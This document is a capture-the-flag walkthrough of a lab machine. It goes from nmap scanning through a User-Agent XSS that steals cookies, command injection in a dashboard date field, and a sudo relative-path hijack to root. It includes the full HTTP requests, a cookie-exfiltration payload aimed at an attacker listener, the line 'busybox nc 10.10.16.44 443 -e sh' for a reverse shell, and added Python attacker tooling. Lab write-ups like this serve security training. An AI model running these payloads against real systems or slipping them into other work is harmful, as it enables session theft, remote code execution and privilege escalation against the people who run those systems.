Recon:

```bash
nmap 10.10.11.8 --min-rate 2000 -Pn -p1-10000 -sT -n
```

[screenshot: port scan]

```bash
nmap 10.10.11.8 -p22,53,5000 -sC -sV -Pn
```

[screenshot: service scan of 22, 53, 5000]

GetShell:

A web service is running on port 5000:

[screenshot]

Opening it shows a support form that sends a message to the backend. If you deliberately put a payload into the form, the server responds with a warning page:

[screenshot]

With normal input, nothing happens:

[screenshot]

The warning page reflects request fields back to the client, which can be used to try XSS:

[screenshot]

Since the User-Agent header is one of the reflected fields, change it (the `<script>` in the message field is what triggers the warning page; the User-Agent is then rendered into it):

```http
POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 115
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

fname=test&lname=test&email=kali%40kali.com&phone=12345678901&message=%3Cscirpt%3Ealert%28%221%22%29%3C%2Fscript%3E
```

[screenshot: alert fires on the warning page]

Now build the cookie-stealing request. The payload loads an image from the attacker's listener (10.10.16.44) with the victim's base64-encoded cookie in the query string, so whoever views the warning page leaks their cookie:

```http
POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 115
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <script>var i=new Image(); i.src="http://10.10.16.44/?cookie="+btoa(document.cookie);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

fname=test&lname=test&email=kali%40kali.com&phone=12345678901&message=%3Cscirpt%3Ealert%28%221%22%29%3C%2Fscript%3E
```

[screenshot: request sent] [screenshot: listener receives the base64 cookie]

Decode the captured cookie and access the directory with it set:

[screenshot] [screenshot]

Intercept the request in Burp. Appending a command after the date value gives RCE, i.e. the date field is passed to a shell unsanitized:

[screenshot]

Reverse shell (Content-Length corrected to match the 48-byte body; Burp updates it automatically when you edit the request):

```http
POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 48
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/dashboard
Accept-Encoding: gzip, deflate, br
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Connection: keep-alive

date=2023-09-15;busybox nc 10.10.16.44 443 -e sh
```

[screenshot: shell caught on port 443]
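The attacker side of the two web steps above, as an added example that is not code from the writeup: a small listener that decodes the cookie beacon sent by the User-Agent XSS, a decoder for the payload segment of the `is_admin` value (it is a base64url JSON string followed by a signature, so only the payload can be read; nothing here verifies or forges the signature), and a builder for the `/dashboard` body that abuses the date field. The listener address, port and the sample cookie are assumptions/constructed values; in the writeup the listener was 10.10.16.44 on port 80.

```python
"""Attacker-side helpers for the User-Agent XSS cookie theft and the
/dashboard command injection.  Added example, not the writeup's code."""
import base64
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed sample: the cookie value seen in the writeup's request.
SAMPLE_COOKIE = "is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0"


def xss_beacon_payload(listener: str) -> str:
    """User-Agent value used in the writeup: an image load that leaks
    btoa(document.cookie) to the attacker's listener (hypothetical address)."""
    return ('<script>var i=new Image(); i.src="http://%s/?cookie="'
            '+btoa(document.cookie);</script>' % listener)


def beacon_path(cookie: str) -> str:
    """Request path the victim's browser fetches (btoa == standard base64)."""
    return "/?cookie=" + base64.b64encode(cookie.encode()).decode()


def cookie_from_beacon(path: str) -> Optional[str]:
    """Recover document.cookie from a beacon request path.  The JS never
    URL-encodes the base64, so a literal '+' arrives and parse_qs turns it
    into a space; put it back before decoding."""
    qs = parse_qs(urlparse(path).query)
    if "cookie" not in qs:
        return None
    b64 = qs["cookie"][0].replace(" ", "+")
    return base64.b64decode(b64).decode()


def decode_signed_value(value: str) -> object:
    """Read the payload of an itsdangerous-style token (base64url payload,
    '.', signature) such as the is_admin value.  Only the payload is decoded;
    the signature is not checked, and without the secret it cannot be forged."""
    payload = value.split(".", 1)[0]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))


def injection_body(cmd: str, date: str = "2023-09-15") -> str:
    """Form body for /dashboard: the date field reaches a shell, so ';'
    closes the original command and appends ours."""
    return urlencode({"date": "%s;%s" % (date, cmd)})


class _BeaconHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = cookie_from_beacon(self.path)
        if cookie is not None:
            self.server.cookies.append(cookie)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # silence per-request logging


def start_listener(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Background listener collecting decoded cookies in server.cookies.
    port=0 picks a free port (assumption for the offline demo)."""
    server = HTTPServer((host, port), _BeaconHandler)
    server.cookies = []
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def simulate_beacon(listener: str, cookie: str) -> int:
    """Stand-in for the victim's browser: fetch the beacon URL and return the
    HTTP status, so the example runs without a real target."""
    with urllib.request.urlopen("http://%s%s" % (listener, beacon_path(cookie))) as r:
        return r.status


if __name__ == "__main__":
    srv = start_listener()
    addr = "%s:%d" % srv.server_address
    print("User-Agent payload:", xss_beacon_payload(addr))
    simulate_beacon(addr, SAMPLE_COOKIE)
    leaked = srv.cookies[0]
    print("leaked cookie:", leaked)
    print("is_admin payload:", decode_signed_value(leaked.split("=", 1)[1]))
    print("RCE body:", injection_body("busybox nc 10.10.16.44 443 -e sh"))
    srv.shutdown()
```

The `is_admin` payload decodes to the JSON string `"admin"`: the role is stored client-side and protected only by the signature, which is why a stolen admin cookie is enough and why the value cannot simply be edited without the server's secret.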

GetRoot:

Find the privilege-escalation vector (sudo rules and the script they allow):

[screenshot] [screenshot]

The allowed script calls initdb.sh by relative path, so create an initdb.sh in the current directory that just spawns a shell:

```bash
echo -e '#!/bin/bash\n/bin/bash' > initdb.sh
```

Run the sudo target from that directory and get root. If the target executes the file directly rather than through an interpreter, initdb.sh also needs the execute bit set, otherwise the relative call fails silently:

[screenshot: root shell]
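Why dropping a file into the current directory is enough, as an added example that is not the writeup's code: a stand-in for a sudo-allowed script that runs `./initdb.sh` by relative path executes whatever file of that name sits in the caller's working directory. The script names and contents are hypothetical (the real target only appears in the screenshot); the hijack file writes a marker instead of spawning `/bin/bash` so the demo can run unprivileged, and the second call shows the failure mode when the execute bit is forgotten.

```python
"""Relative-path hijack demo.  Added example, not the writeup's code."""
import os
import subprocess
import tempfile

# Constructed stand-in for the sudo-allowed script (hypothetical name and
# body).  The bug is the relative './initdb.sh' instead of an absolute,
# root-owned path.
PRIVILEGED_SCRIPT = """#!/bin/sh
./initdb.sh
echo maintenance-done
"""

# The file we drop in the working directory.  In the real chain the body is
# '/bin/bash'; here it writes a marker so the demo runs without sudo.
HIJACK_SCRIPT = """#!/bin/sh
echo HIJACKED > marker.txt
"""


def run_hijack_demo(make_executable: bool = True):
    """Write both scripts into a fresh directory, run the 'privileged' one
    from there, and return what the hijack file managed to write (None if it
    never ran).  make_executable=False reproduces a forgotten chmod +x: the
    relative exec fails and no marker appears."""
    workdir = tempfile.mkdtemp()
    priv = os.path.join(workdir, "maintenance.sh")  # hypothetical name
    hijack = os.path.join(workdir, "initdb.sh")
    with open(priv, "w") as f:
        f.write(PRIVILEGED_SCRIPT)
    with open(hijack, "w") as f:
        f.write(HIJACK_SCRIPT)
    os.chmod(priv, 0o755)
    if make_executable:
        os.chmod(hijack, 0o755)
    # cwd=workdir is the same as cd'ing there before 'sudo <script>'
    subprocess.run(["/bin/sh", priv], cwd=workdir,
                   capture_output=True, text=True)
    marker = os.path.join(workdir, "marker.txt")
    if not os.path.exists(marker):
        return None
    with open(marker) as f:
        return f.read().strip()


if __name__ == "__main__":
    print("executable hijack   ->", run_hijack_demo(True))
    print("missing execute bit ->", run_hijack_demo(False))
```

The fix on the defender's side is the mirror image: invoke helpers by absolute path from a root-owned directory, or `cd` to a fixed location inside the script before any relative call.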